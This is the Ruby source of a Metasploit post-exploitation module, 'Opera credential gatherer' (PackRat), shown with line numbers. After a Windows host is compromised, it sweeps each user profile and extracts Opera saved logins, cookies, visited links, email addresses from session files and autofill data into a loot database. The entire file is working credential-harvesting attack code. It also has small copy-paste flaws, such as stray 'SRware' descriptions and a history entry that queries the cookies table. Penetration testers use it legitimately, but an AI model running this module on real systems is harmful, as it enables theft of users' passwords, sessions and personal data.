Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  # this associative array defines the artifacts known to PackRat
9
  include Msf::Post::File
10
  include Msf::Post::Windows::UserProfiles
11
  include Msf::Post::Windows::Packrat
12
  ARTIFACTS =
13
    {
14
      application: 'opera',
15
      app_category: 'browsers',
16
      gatherable_artifacts: [
17
        {
18
          filetypes: 'logins',
19
          path: 'AppData',
20
          dir: 'Opera Software',
21
          artifact_file_name: 'Login Data',
22
          description: "Opera's sent and received emails",
23
          credential_type: 'sqlite',
24
          sql_search: [
25
            {
26
              sql_description: "Database Commands which exports SRware's Login data",
27
              sql_table: 'logins',
28
              sql_column: 'action_url, username_value'
29
            }
30
          ]
31
        },
32
        {
33
          filetypes: 'cookies',
34
          path: 'AppData',
35
          dir: 'Opera Software',
36
          artifact_file_name: 'Cookies',
37
          description: "Opera's Cookies",
38
          credential_type: 'sqlite',
39
          sql_search: [
40
            {
41
              sql_description: "Database Commands which exports SRware's Login data",
42
              sql_table: 'cookies',
43
              sql_column: 'host_key, name, path'
44
            }
45
          ]
46
        },
47
        {
48
          filetypes: 'web_history',
49
          path: 'AppData',
50
          dir: 'Opera Software',
51
          artifact_file_name: 'Visited Links',
52
          description: "Opera's Visited Links",
53
          credential_type: 'database',
54
          sql_search: [
55
            {
56
              sql_description: 'Database Commands which exports ',
57
              sql_table: 'cookies',
58
              sql_column: 'host_key, name, path'
59
            }
60
          ]
61
        },
62
        {
63
          filetypes: 'Email',
64
          path: 'AppData',
65
          dir: 'Opera Software',
66
          artifact_file_name: 'Session*',
67
          description: 'Emails stored in session file',
68
          credential_type: 'text',
69
          regex_search: [
70
            {
71
              extraction_description: 'searches for Email TO/FROM address',
72
              extraction_type: 'Email addresses',
73
              regex: [
74
                '(?i-mx:email=.*)',
75
              ]
76
            }
77
          ]
78
        },
79
        {
80
          filetypes: 'personal infomration',
81
          path: 'AppData',
82
          dir: 'Opera Software',
83
          artifact_file_name: 'Web Data',
84
          description: 'Auto filles sotred in the database',
85
          credential_type: 'sqlite',
86
          sql_search: [
87
            {
88
              sql_description: 'Database Commands which exports stored auto-fill data',
89
              sql_table: 'autofill',
90
              sql_column: 'name, value'
91
            }
92
          ]
93
        }
94
      ]
95
    }.freeze
96

97
  def initialize(info = {})
98
    super(
99
      update_info(
100
        info,
101
        'Name' => 'Opera credential gatherer',
102
        'Description' => %q{
103
          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
104
          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
105
          Further details can be found in the module documentation.
106
          This is a module that searches for Opera credentials on a windows remote host.
107
        },
108
        'License' => MSF_LICENSE,
109
        'Author' => [
110
          'Kazuyoshi Maruta',
111
          'Daniel Hallsworth',
112
          'Barwar Salim M',
113
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
114
        ],
115
        'Platform' => ['win'],
116
        'SessionTypes' => ['meterpreter'],
117
        'Notes' => {
118
          'Stability' => [CRASH_SAFE],
119
          'Reliability' => [],
120
          'SideEffects' => []
121
        }
122
      )
123
    )
124

125
    register_options(
126
      [
127
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
128
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
129
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
130
        # enumerates the options based on the artifacts that are defined below
131
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
132
      ]
133
    )
134
  end
135

136
  def run
137
    print_status('Filtering based on these selections:  ')
138
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
139
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
140
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
141

142
    # used to grab files for each user on the remote host
143
    grab_user_profiles.each do |userprofile|
144
      run_packrat(userprofile, ARTIFACTS)
145
    end
146

147
    print_status 'PackRat credential sweep Completed'
148
  end
149
end
150

151